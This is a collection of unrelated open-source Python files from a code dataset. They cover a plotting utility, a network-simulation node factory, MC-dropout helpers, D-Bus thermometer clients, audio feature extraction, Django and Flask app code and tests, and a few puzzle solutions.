window_length = self._window_length_list[plot_index]\n if len_arr > window_length:\n start_index = len_arr - window_length\n self._xdata_list[plot_index][dataset_index] = self._xdata_list[plot_index][dataset_index][start_index:]\n self._ydata_list[plot_index][dataset_index] = self._ydata_list[plot_index][dataset_index][start_index:]\n\n def set_plot_data(self,plot_id,data_label,xdata,ydata):\n plot_index = self._plot_dict[plot_id]\n dataset_index = self._data_line_labels[plot_index][data_label]\n self._xdata_list[plot_index][dataset_index] = xdata\n self._ydata_list[plot_index][dataset_index] = ydata\n self._window_length_list[plot_index] = len(self._xdata_list[plot_index][dataset_index])\n\n def set_window_length(self, plot_id, window_length):\n self._window_length_list[plot_id] = window_length\n \n def update_plots(self):\n for plot_index in range(self._num_plots):\n num_data_sets = len(self._data_lines_list[plot_index])\n for dataset_index in range(num_data_sets):\n self._data_lines_list[plot_index][dataset_index].setData(\n self._xdata_list[plot_index][dataset_index],\n self._ydata_list[plot_index][dataset_index])\n \n def process_app(self, sleep_time = 0):\n self._app.processEvents()\n time.sleep(sleep_time)\n\n def show_window(self, sleep_time = 0):\n self.update_plots()\n self._window.show()\n self.process_app(sleep_time)\n\n def close_window(self):\n self._window.close()\n\n def hold_window_until_exit(self):\n self._app.exec()\n\n def save_image(self,image_name=\"plotter_image\"):\n self._widget.grab().save(image_name+\".png\")","repo_name":"randybeard/mavsim_public","sub_path":"mavsim_python/plotter/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","stars":294,"dataset":"github-code","pt":"81"} +{"seq_id":"74982776904","text":"import numpy\nfrom core import Hardware, INF\nfrom unit import *\n\n\nclass NodeBase(Hardware):\n def __init__(self):\n super().__init__()\n self.node_type = 'router'\n self.pos = numpy.random.rand(2) * 1000 # 给出一个 (0~1000, 0~1000) 的随机位置信息\n\n\ndef nodeFactory(\n node_type='router', # enum('server', 'router', 'client')\n\n recv_rate=1,\n recv_capacity=INF,\n nonce_life_time=100_000,\n\n 
cs_capacity=None,\n cs_probability= 1.0,\n replace_mode=None,\n evict_mode=None, # enum('CONST', 'FIFO', 'LRU', 'GEOMETRIC')\n evict_life_time=None,\n\n AppType=AppUnit,\n InfoType=IOInfoUnit,\n ForwardType=FloodForwardUnit,\n ContentStoreType= ContentStoreUnit,\n):\n MODE_FIELD_MAP = {'FIFO': 'c_time', 'LRU': 'a_time', 'LFU': 'hit_count'}\n\n def factor():\n node = NodeBase()\n\n assert node_type in ('server', 'router', 'client')\n node.node_type = node_type\n\n node.pos = numpy.random.rand(2) * 1000 # 给出一个 (0~1000, 0~1000) 的随机位置信息\n\n # 配置接口模块\n node.install('face', FaceUnit(rate=recv_rate, capacity=recv_capacity, life_time=nonce_life_time))\n\n # 配置CS模块\n if cs_capacity is not None:\n node.install('cs', ContentStoreType(capacity=cs_capacity, probability=cs_probability))\n\n # 配置替换模块\n if replace_mode is not None:\n field = MODE_FIELD_MAP[replace_mode]\n node.install('replace', ReplaceUnit(field))\n\n # 安装自动驱逐模块\n if evict_mode is not None:\n assert evict_mode in CSEvictUnit.MODE_TYPES\n node.install('evict', CSEvictUnit(mode=evict_mode, life_time=evict_life_time))\n\n # 安装 应用层模块,信息模块, 转发模块\n node.install('app', AppType()) # 必须安装在FaceUnit后, 才能建立APPChannel\n node.install('info', InfoType()) # 安装在 ForwardUnit 前, InfoUnit 才能先行处理 inPack 信号\n node.install('forward', ForwardType())\n\n # 添加便捷调用函数\n node.store = node.api['CS.store']\n node.ask = node.api['App.ask']\n\n return node\n\n return factor\n","repo_name":"GeekBerry/LICNsim","sub_path":"unit/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"29961507314","text":"import torch\r\n\r\nfrom collections import Counter\r\nfrom alpaca.uncertainty_estimator.masks import build_mask\r\nfrom typing import Iterable, Union, Dict\r\n\r\n\r\nimport numpy as np\r\nimport time\r\nimport random\r\n\r\nimport logging\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\nclass DropoutMC(torch.nn.Module):\r\n def __init__(self, p: float, activate=False):\r\n super().__init__()\r\n self.activate = activate\r\n self.p = p\r\n self.p_init = p\r\n\r\n def forward(self, x: torch.Tensor):\r\n return torch.nn.functional.dropout(\r\n x, self.p, training=self.training or self.activate\r\n )\r\n\r\n\r\ndef convert_to_mc_dropout(\r\n model: torch.nn.Module, substitution_dict: Dict[str, torch.nn.Module] = None\r\n):\r\n for i, layer in enumerate(list(model.children())):\r\n proba_field_name = \"dropout_rate\" if \"flair\" in str(type(layer)) else \"p\"\r\n module_name = list(model._modules.items())[i][0]\r\n layer_name = layer._get_name()\r\n if layer_name in substitution_dict.keys():\r\n model._modules[module_name] = substitution_dict[layer_name](\r\n p=getattr(layer, proba_field_name), activate=False\r\n )\r\n else:\r\n convert_to_mc_dropout(model=layer, substitution_dict=substitution_dict)\r\n\r\n\r\ndef activate_mc_dropout(\r\n model: torch.nn.Module, activate: bool, random: float = 0.0, verbose: bool = False\r\n):\r\n for layer in model.children():\r\n if isinstance(layer, DropoutMC):\r\n layer.activate = activate\r\n if activate and random:\r\n layer.p = random\r\n if not activate:\r\n layer.p = layer.p_init\r\n else:\r\n activate_mc_dropout(\r\n model=layer, activate=activate, random=random, verbose=verbose\r\n )\r\n\r\ndef convert_dropouts(model, dropout_type='MC'):\r\n if dropout_type == 'MC':\r\n dropout_ctor = lambda p, activate: DropoutMC(\r\n p=0.1, activate=False\r\n )\r\n elif dropout_type == \"DPP\":\r\n\r\n def dropout_ctor(p, 
activate):\r\n return DropoutDPP(\r\n p=p,\r\n activate=activate,\r\n max_n=100,\r\n max_frac=0.8,\r\n mask_name=\"dpp\",\r\n )\r\n\r\n else:\r\n raise ValueError(f\"Wrong dropout type: {ue_args.dropout_type}\")\r\n\r\n # set_last_dropout(model, dropout_ctor(p=ue_args.inference_prob, activate=False))\r\n if dropout_type == \"DPP\":\r\n model.dropout = dropout_ctor(p=0.1, activate=False)\r\n else:\r\n convert_to_mc_dropout(model, {\"Dropout\": dropout_ctor})\r\n # model.dropout = DropoutDPP(\r\n # p=0.1,\r\n # activate=False,\r\n # max_n=100,\r\n # max_frac=0.8,\r\n # mask_name=\"dpp\",\r\n # )\r\n","repo_name":"uclanlp/AdvExDetection-ADDMU","sub_path":"utils/dropout_mc.py","file_name":"dropout_mc.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"10014156558","text":"from . import interface_repo\nfrom . import node\nfrom . import error\nfrom . import names\nfrom . import _util\nfrom .thermometer import Thermometer_Client, TemperatureHistory_Client\n\n\nclass ThermometerCenter_Client:\n def __init__(self, bus):\n self.__bus = bus\n self.__iface = _util.get_iface(\n bus=bus,\n busname=names.Bus.THERMOMETERS,\n path=names.ThermometerPaths.CENTER,\n iface=interface_repo.THERMOMETERCENTER)\n\n @error.maperror\n def all_names(self):\n return self.__iface.all_names()\n\n @error.maperror\n def get_thermometer(self, name):\n return Thermometer_Client(proxy=_util.get_iface(\n bus=self.__bus,\n busname=names.Bus.THERMOMETERS,\n path=names.ThermometerPaths.THERMOMETER(name),\n iface=interface_repo.THERMOMETER))\n\n @error.maperror\n def get_history(self, name):\n return TemperatureHistory_Client(proxy=_util.get_iface(\n bus=self.__bus,\n busname=names.Bus.THERMOMETERS,\n path=names.ThermometerPaths.THERMOMETER(name),\n iface=interface_repo.TEMPERATUREHISTORY))\n\n @error.maperror\n def force_update(self, timestamp):\n for name in self.all_names():\n self.get_thermometer(name).force_update(timestamp)\n\n\n@node.Definition(interfaces=interface_repo.get(\n interface_repo.THERMOMETERCENTER,\n interface_repo.POLLABLE))\nclass ThermometerCenter_Server:\n '''D-Bus object that ... well, sort of ... 
maintains thermometer\n objects.\n\n '''\n def __init__(self, objects):\n self.__objects = objects\n\n def all_names(self):\n ''':returns: list strings; names of maintained thermometers.\n\n '''\n return [o.get_name() for o in self.__objects]\n\n def poll(self, timestamp):\n '''Polls all maintained thermometers.\n\n '''\n for o in self.__objects:\n o.poll(timestamp)\n","repo_name":"jfasch/openheating","sub_path":"openheating/dbus/thermometer_center.py","file_name":"thermometer_center.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"31238565902","text":"# This script is modifed from https://github.com/AndreyGuzhov/AudioCLIP/blob/master/demo/AudioCLIP.ipynb\n\n# Modify this PATH variable if you install ESC-50 somewhere else\nPATH = '../data/esc-50/'\n\nimport sys\nprint(sys.version)\nimport os\n\nimport librosa\nimport numpy as np\nfrom tqdm import tqdm\n\nimport torch\n\n# sys.path.append(os.path.abspath(f'{os.getcwd()}/..'))\n\nimport csv\nfrom model import AudioCLIP\nfrom utils.transforms import ToTensor1D\n\ntorch.set_grad_enabled(False)\n\nMODEL_FILENAME = 'AudioCLIP-Partial-Training.pt'\n# derived from ESResNeXt\nSAMPLE_RATE = 44100\n\naclp = AudioCLIP(pretrained=f'{PATH}/{MODEL_FILENAME}')\naudio_transforms = ToTensor1D()\n\n\nESC_path = f\"{PATH}/ESC-50-master\"\n\n\ndef read_csv(filename):\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n return list(reader)\n\nmetadata = read_csv(f'{ESC_path}/meta/esc50.csv')\n\nsave_path = f'{PATH}/features.pt'\nFILE_PATH_INDEX = 0\nFOLD_INDEX = 1\nCLASS_INDEX = 2\nCLASSNAME_INDEX = 3\nID_INDEX = 5\n\nif not os.path.exists(save_path):\n track_list = {\n i: list()\n for i in range(5)\n }\n meta = {\n i: list()\n for i in range(5)\n }\n for idx, line in tqdm(enumerate(metadata[1:])):\n path_to_audio = f'{ESC_path}/audio/{line[FILE_PATH_INDEX]}'\n fold_index = int(line[FOLD_INDEX]) - 1\n track, _ = librosa.load(path_to_audio, sr=SAMPLE_RATE, dtype=np.float32)\n if track.shape[0] > 220500:\n track = track[:220500]\n else:\n track = np.pad(track, (0, 220500 - track.shape[0]), 'constant')\n track_list[fold_index].append(track)\n \n meta[fold_index].append(\n {\n 'class': int(line[CLASS_INDEX]),\n 'classname' : line[CLASSNAME_INDEX],\n 'path': line[FILE_PATH_INDEX]\n }\n )\n\n esc50_dict = {\n i: dict()\n for i in range(5)\n }\n batch_size = 10\n for fold_index in range(5):\n # chunk track_list into batches\n tracks_allfold = [track_list[fold_index][i:i + batch_size] for i in range(0, len(track_list[fold_index]), batch_size)]\n \n final_audio_stacked = None\n for tracks in tqdm(tracks_allfold):\n audio_stacked = torch.stack([audio_transforms(track.reshape(1, -1)) for track in tracks])\n ((audio_features_stacked, _, _), _), _ = aclp(audio=audio_stacked)\n audio_features_stacked = audio_features_stacked / torch.linalg.norm(audio_features_stacked, dim=-1, keepdim=True)\n\n if final_audio_stacked is None:\n final_audio_stacked = audio_features_stacked\n else:\n final_audio_stacked = torch.cat((final_audio_stacked, audio_features_stacked), dim=0)\n assert len(meta[fold_index]) == final_audio_stacked.shape[0]\n esc50_dict[fold_index]['features'] = final_audio_stacked\n esc50_dict[fold_index]['labels'] = torch.Tensor([d['class'] for d in meta[fold_index]]).long()\n esc50_dict[fold_index]['labelnames'] = [d['classname'] for d in meta[fold_index]]\n esc50_dict[fold_index]['paths'] = [d['path'] for d in meta[fold_index]]\n torch.save(esc50_dict, 
save_path)\nelse:\n esc50_dict = torch.load(save_path)\n","repo_name":"linzhiqiu/cross_modal_adaptation","sub_path":"audioclip/audio_features.py","file_name":"audio_features.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"81"} +{"seq_id":"13746889494","text":"from django.urls import include, path\nfrom .import views \n\nurlpatterns = [\n path('', views.Acceuil, name=\"acceuil\"),\n path('/tableauBord', views.Dashboard, name=\"dashboard\"),\n path('/assureTable', views.TableAssure, name=\"tablesAssure\"),\n path('/ayantDroitTable', views.TableAyantDroit, name=\"tableAyantDroit\"),\n path('/CampagnieAssuranceTable', views.TableCampagnieAssurance, name=\"tableCampagnieAssurance\"),\n path('/commandeTable', views.TableCommande, name=\"tableCommande\"),\n path('/livraisonTable', views.TableLivraison, name=\"tableLivraison\"),\n path('/livreurTable', views.TableLivreur, name=\"tableLivreur\"),\n path('/medicamentTable', views.TableMedicament, name=\"tableMadicament\"),\n path('/societeTable', views.TableSociete, name=\"tableSociete\"),\n path('soucheTable', views.TableSouche, name=\"tableSouche\"),\n path('/vendeurTable', views.TableVendeur, name=\"tableVendeur\"),\n path('/assureFiche', views.FicheAssure, name=\"ficheAssure\"),\n path('/ayantDroitFiche', views.FicheAyantDroit, name=\"ficheAyantDroit\"),\n path('/CampagnieAssuranceFiche', views.FicheCampagnieAssurance, name=\"ficheCampagnieAssurance\"),\n path('/commandeFiche', views.FicheCommande, name=\"ficheCommande\"),\n path('/livraisonFiche', views.FicheLivraison, name=\"ficheLivraison\"),\n path('/livreurFiche', views.FicheLivreur, name=\"ficheLivreur\"),\n path('/medicamentFiche', views.FicheMedicament, name=\"ficheMedicament\"),\n path('/societeFiche', views.FicheSociete, name=\"ficheSociete\"),\n path('/soucheFiche', views.FicheSouche, name=\"ficheSouche\"),\n path('/vendeurFiche', views.FicheVendeur, name=\"ficheVendeur\"),\n path('/incriptionFiche', views.FicheInscription, name=\"ficheInscription\"),\n path('/connexionFiche', views.FicheConnexion, name=\"ficheConnexion\"),\n]\n\n","repo_name":"Ominngsa/MAVRE_LICENCE","sub_path":"SOUTENANCE_MAVRE/utilisateurs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8041012137","text":"from flask import Flask\nfrom flask_login import LoginManager\nfrom flask_migrate import Migrate\nfrom flask_wtf.csrf import CSRFProtect\n\nfrom config import Config\nfrom models import db\n\nfrom blueprints import guest_bp, user_bp\n\n\ndef create_app():\n app = Flask(__name__)\n app.config.from_object(Config)\n\n login_manager = LoginManager()\n login_manager.login_view = 'guest_views.login'\n login_manager.init_app(app)\n\n csrf = CSRFProtect()\n csrf.init_app(app)\n\n db.init_app(app)\n\n migrate = Migrate(app, db)\n migrate.init_app(app, db)\n\n app.register_blueprint(guest_bp.guest_blueprint)\n app.register_blueprint(user_bp.user_blueprint)\n\n @login_manager.user_loader\n def load_user(user_id):\n from models import User\n if User.query.get(user_id):\n return User.query.get(user_id)\n else:\n return None\n\n return app\n\n\napp_instance = create_app()\n\nif __name__ == '__main__':\n 
app_instance.run(threaded=True)\n","repo_name":"ghandylan/flask-notes","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34916331386","text":"\"\"\"empty message\n\nRevision ID: d0fe5a2ca6a2\nRevises: 3af2cdf261e9\nCreate Date: 2021-12-09 20:20:40.244136\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"d0fe5a2ca6a2\"\ndown_revision = \"3af2cdf261e9\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table(\"albums_roles\") as batch_op:\n batch_op.create_unique_constraint(\"album_role_unique\", [\"album_id\", \"role_id\"])\n with op.batch_alter_table(\"users_roles\") as batch_op:\n batch_op.create_unique_constraint(\"user_role_unique\", [\"user_id\", \"role_id\"])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, \"users_roles\", type_=\"unique\")\n op.drop_constraint(None, \"albums_roles\", type_=\"unique\")\n # ### end Alembic commands ###\n","repo_name":"akleiw/flaskgallery","sub_path":"migrations/versions/d0fe5a2ca6a2_.py","file_name":"d0fe5a2ca6a2_.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8143775426","text":"from unittest import TestCase, main as unittest_main, mock\nfrom app import app\nfrom bson.objectid import ObjectId\n\n\nsample_item_id = ObjectId('5d55cffc4a3d4031f42827a3')\nsample_item = {\n 'name': 'Spaghetti',\n 'image': 'https://thecozyapron.com/wp-content/uploads/2019/05/spaghetti-bolognese_thecozyapron_1.jpg',\n 'price': '10',\n \"description and quantity\":'Good spaghetti and 2 bowls'\n}\nsample_form_data = {\n 'name': sample_item['name'],\n 'image': sample_item['image'],\n 'price': sample_item['price'],\n 'description and quantity': sample_item['description']\n}\n\n\nclass listingsTests(TestCase):\n \"\"\"Flask tests.\"\"\"\n\n def setUp(self):\n \"\"\"Stuff to do before every test.\"\"\"\n\n # Get the Flask test client\n self.client = app.test_client()\n\n # Show Flask errors that happen during tests\n app.config['TESTING'] = True\n\n def test_index(self):\n \"\"\"Test the pantry homepage.\"\"\"\n result = self.client.get('/')\n self.assertEqual(result.status, '200 OK')\n self.assertIn(b'listing', result.data)\n\n def test_new(self):\n \"\"\"Test the new listing creation page.\"\"\"\n result = self.client.get('/pantry/new')\n self.assertEqual(result.status, '200 OK')\n self.assertIn(b'New item', result.data)\n\n @mock.patch('pymongo.collection.Collection.find_one')\n def test_show_item(self, mock_find):\n \"\"\"Test showing a single listing.\"\"\"\n mock_find.return_value = sample_item\n\n result = self.client.get(f'/pantry/{sample_item_id}')\n self.assertEqual(result.status, '200 OK')\n self.assertIn(b'Item', result.data)\n\n @mock.patch('pymongo.collection.Collection.find_one')\n def test_edit_item(self, mock_find):\n \"\"\"Test editing a single item.\"\"\"\n mock_find.return_value = sample_item\n\n result = self.client.get(f'/pantry/{sample_item_id}/edit')\n self.assertEqual(result.status, '200 OK')\n self.assertIn(b'Spaghetti', result.data)\n\n @mock.patch('pymongo.collection.Collection.insert_one')\n def test_submit_item(self, mock_insert):\n \"\"\"Test 
submitting a new item.\"\"\"\n result = self.client.post('/pantry/new', data=sample_form_data)\n\n # After submitting, should redirect to that item's page\n self.assertEqual(result.status, '302 FOUND')\n mock_insert.assert_called_with(sample_item)\n\n @mock.patch('pymongo.collection.Collection.update_one')\n def test_update_item(self, mock_update):\n result = self.client.post(f'/pantry/{sample_item_id}', data=sample_form_data)\n\n self.assertEqual(result.status, '302 FOUND')\n mock_update.assert_called_with({'_id': sample_item_id}, {'$set': sample_item})\n @mock.patch('pymongo.collection.Collection.delete_one')\n def test_delete_item(self, mock_delete):\n form_data = {'_method': 'DELETE'}\n result = self.client.post(f'/pantry/{sample_item_id}/delete', data=form_data)\n self.assertEqual(result.status, '302 FOUND')\n mock_delete.assert_called_with({'_id': sample_item_id})\nif __name__ == '__main__':\n unittest_main()","repo_name":"franklin-phan/Pantry-App","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"23817229901","text":"from time import time\nt0 = time()\n\na = [5,1,9,18,13,8,0]\n\ncache = {}\n\ndef add_to_cache(k, v):\n if k not in cache:\n cache[k] = [-1, v]\n return\n cache[k][0] = cache[k][1]\n cache[k][1] = v\n\nfor i, val in enumerate(a):\n add_to_cache(val, i + 1)\n\ncur = a[-1]\nfor i in range(len(a), 2020):\n add_to_cache(cur, i)\n prev = cache[cur][0]\n cur = 0 if prev == -1 else i - prev\n\nprint(cur)\n\nprint(f'Time: {(time()-t0) * 1000}ms')\n","repo_name":"JonathanBouwer/AdventOfCode","sub_path":"2020/15-a.py","file_name":"15-a.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21761712126","text":"class Solution:\n def countSubIslands(grid1, grid2) -> int:\n #dfs on grid2 when finding a 1.\n #if a 1 on grid2 is 0 on grid1, break and don't add to count\n visited = set()\n m = len(grid2)\n n = len(grid2[0])\n def neighbors(i,j):\n neighbs = []\n if m - 1 > i and grid2[i+1][j] == 1:\n neighbs.append((i+1,j))\n if i > 0 and grid2[i-1][j] == 1:\n neighbs.append((i-1,j))\n if j < n - 1 and grid2[i][j+1] == 1:\n neighbs.append((i,j+1))\n if j > 0 and grid2[i][j-1] == 1:\n neighbs.append((i,j-1))\n return neighbs\n\n def isSubIsland(i,j):\n res = True\n stack = [(i,j)]\n while stack:\n coords = stack.pop()\n if coords not in visited:\n visited.add(coords)\n stack.extend(neighbors(*coords))\n if grid1[coords[0]][coords[1]] == 0:\n res = False\n return res\n\n count = 0\n\n for i in range(m):\n for j in range(n):\n if grid2[i][j] == 0:\n continue\n if (i,j) not in visited and isSubIsland(i,j):\n print(i,j)\n count += 1\n return count\ngrid1=[[1,0,1,0,1],[1,1,1,1,1],[0,0,0,0,0],[1,1,1,1,1],[1,0,1,0,1]]\ngrid2=[[0,0,0,0,0],[1,1,1,1,1],[0,1,0,1,0],[0,1,0,1,0],[1,0,0,0,1]]\nprint(Solution.countSubIslands(grid1,grid2))\n","repo_name":"jrchew15/leetcode","sub_path":"subIsland.py","file_name":"subIsland.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41695631634","text":"#!/usr/bin/python3\n\"\"\"\nIn an election, the i-th vote was cast for persons[i] at time times[i].\n\nNow, we would like to implement the following query function:\nTopVotedCandidate.q(int t) will return the number of the person that was leading\nthe election at time 
t.\n\nVotes cast at time t will count towards our query. In the case of a tie, the\nmost recent vote (among tied candidates) wins.\n\nExample 1:\n\nInput: [\"TopVotedCandidate\",\"q\",\"q\",\"q\",\"q\",\"q\",\"q\"], [[[0,1,1,0,0,1,0],\n[0,5,10,15,20,25,30]],[3],[12],[25],[15],[24],[8]]\nOutput: [null,0,1,1,0,0,1]\nExplanation:\nAt time 3, the votes are [0], and 0 is leading.\nAt time 12, the votes are [0,1,1], and 1 is leading.\nAt time 25, the votes are [0,1,1,0,0,1], and 1 is leading (as ties go to the\nmost recent vote.)\nThis continues for 3 more queries at time 15, 24, and 8.\n\nNote:\n\n1 <= persons.length = times.length <= 5000\n0 <= persons[i] <= persons.length\ntimes is a strictly increasing array with all elements in [0, 10^9].\nTopVotedCandidate.q is called at most 10000 times per test case.\nTopVotedCandidate.q(int t) is always called with t >= times[0].\n\"\"\"\nfrom typing import List\nfrom collections import defaultdict\nimport bisect\n\n\nclass TopVotedCandidate:\n def __init__(self, persons: List[int], times: List[int]):\n \"\"\"\n Running top vote\n Need to maintain list\n\n but time is too large to enumerate. Cannot have direct access, then\n query is binary search\n \"\"\"\n self.maxes = [] # [(t, i)] at time t\n counter = defaultdict(int)\n tp = sorted(zip(times, persons))\n for t, p in tp:\n counter[p] += 1\n if not self.maxes or counter[self.maxes[-1][1]] <= counter[p]:\n self.maxes.append((t, p))\n\n def q(self, t: int) -> int:\n i = bisect.bisect(self.maxes, (t, 0))\n # equal\n if i < len(self.maxes) and self.maxes[i][0] == t:\n return self.maxes[i][1]\n\n # smaller\n i -= 1\n return self.maxes[i][1]\n\n\n# Your TopVotedCandidate object will be instantiated and called as such:\n# obj = TopVotedCandidate(persons, times)\n# param_1 = obj.q(t)\n","repo_name":"algorhythms/LeetCode","sub_path":"911 Online Election.py","file_name":"911 Online Election.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":843,"dataset":"github-code","pt":"81"} +{"seq_id":"9637037385","text":"#Diseñe un algoritmo que muestre en pantalla su nombre, sexo, edad, salario (incluyendo centavos) y si tiene o no vehículo de transporte.\n\nnombre = 'Harold Yulian Sanchez Alcantar'\nsexo = 'Masculino'\nedad = 24\nsalario = 1_020_000\nvehiculo = False\ntengoVehiculo = (\"No tengo vehiculo\", \"Tengo vehiculo\")[vehiculo]\n\nprint(f\"Nombre: {nombre}\\n\"\\\n f\"Sexo: {sexo}\\n\" \\\n f\"Edad: {edad}\\n\" \\\n f\"Salario: {salario}\\n\"\\\n f\"Vehiculo: {tengoVehiculo}\")\n\n","repo_name":"Smendoza120/Notas-sena","sub_path":"Programacion/Talleres/3)Apropiación/Solucion/Python/1)Primer punto/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29728426803","text":"import os\nimport sys\nimport time\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../')))\n\nfrom sphero_sdk import SpheroRvrObserver\n\nrvr = SpheroRvrObserver()\n\n# Flag used to indicate that calibration is complete\ncalibration_completed = False\n\n\n# Handler for completion of calibration\ndef on_calibration_complete_notify_handler(response):\n global calibration_completed\n\n print('Calibration complete, response:', response)\n calibration_completed = True\n\n\ndef main():\n \"\"\" This program demonstrates the magnetometer calibration to find north.\n \"\"\"\n\n try:\n global calibration_completed\n\n rvr.wake()\n\n # Give 
RVR time to wake up\n time.sleep(2)\n\n # Register for the async on completion of calibration\n rvr.on_magnetometer_calibration_complete_notify(handler=on_calibration_complete_notify_handler)\n\n # Begin calibration\n print('Begin magnetometer calibration to find North...')\n rvr.magnetometer_calibrate_to_north()\n\n # Wait to complete the calibration. Note: In a real project, a timeout mechanism\n # should be here to prevent the script from getting caught in an infinite loop\n while not calibration_completed:\n time.sleep(0)\n\n except KeyboardInterrupt:\n print('\\nProgram terminated with keyboard interrupt.')\n\n finally:\n rvr.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"YutaSuzukiGARI/mirai_FY20","sub_path":"getting_started/observer/magentometer/magnetometer_calibrate_to_north.py","file_name":"magnetometer_calibrate_to_north.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30780276153","text":"from datetime import datetime\n\nfrom odoo.exceptions import ValidationError\n\nfrom odoo.addons.component.tests.common import SavepointComponentCase\n\n\nclass TestResPartner(SavepointComponentCase):\n @classmethod\n def setUpClass(cls):\n super(TestResPartner, cls).setUpClass()\n cls.env = cls.env(context=dict(cls.env.context, tracking_disable=True))\n cls.unique_email = datetime.now().isoformat() + \"@test.com\"\n\n def test_unique_email_partner(self):\n self.assertFalse(self.env[\"res.partner\"]._is_partner_duplicate_prevented())\n partner_1 = self.env[\"res.partner\"].create(\n {\"email\": self.unique_email, \"name\": \"test partner\"}\n )\n # by default we can create partner with same email\n partner_2 = self.env[\"res.partner\"].create(\n {\"email\": self.unique_email, \"name\": \"test partner 2\"}\n )\n self.env[\"ir.config_parameter\"].create(\n {\"key\": \"shopinvader.no_partner_duplicate\", \"value\": \"True\"}\n )\n self.assertTrue(self.env[\"res.partner\"]._is_partner_duplicate_prevented())\n # once you've changed the config to dispable duplicate partner\n # it's no more possible to create a partner with the same email\n with self.assertRaises(ValidationError), self.cr.savepoint():\n self.env[\"res.partner\"].create(\n {\"email\": self.unique_email, \"name\": \"test partner 3\"}\n )\n\n # unicity constrains is only applicable on active records\n partners = partner_1 | partner_2\n partners.write({\"active\": False})\n self.env[\"res.partner\"].create(\n {\"email\": self.unique_email, \"name\": \"test partner 3\"}\n )\n","repo_name":"shopinvader/odoo-shopinvader","sub_path":"shopinvader/tests/test_res_partner.py","file_name":"test_res_partner.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"81"} +{"seq_id":"18871729545","text":"import os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nSECRET_KEY = '%d%o=b7fypwo(y03h0)1p06@4k_)#hbaccx_=@crof9%*ra+a!'\nDEBUG = True\nALLOWED_HOSTS = ['*']\n\nINSTALLED_APPS = (\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'app'\n )\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 
'django.middleware.security.SecurityMiddleware',\n )\n\nROOT_URLCONF = 'django_reactjs.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n ]\n\nWSGI_APPLICATION = 'django_reactjs.wsgi.application'\n\nDATABASES = {}\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nSTATIC_URL = '/static/'\n\n# Webpack configuration\nSTATICFILES_DIRS = ( os.path.join(BASE_DIR, 'frontend'), )\nWEBPACK_LOADER = {\n 'DEFAULT': {\n 'BUNDLE_DIR_NAME': 'bundles/',\n 'STATS_FILE': os.path.join(BASE_DIR, './.webpack/webpack-stats-local.json')\n }\n}\n\nINSTALLED_APPS += ( 'webpack_loader', )\n\nif not DEBUG:\n WEBPACK_LOADER.update({\n 'DEFAULT' : {\n 'BUNDLE_DIR_NAME': 'dist/',\n 'STATS_FILE': os.path.join(BASE_DIR, './.webpack/webpack-stats-prod.json')\n }\n 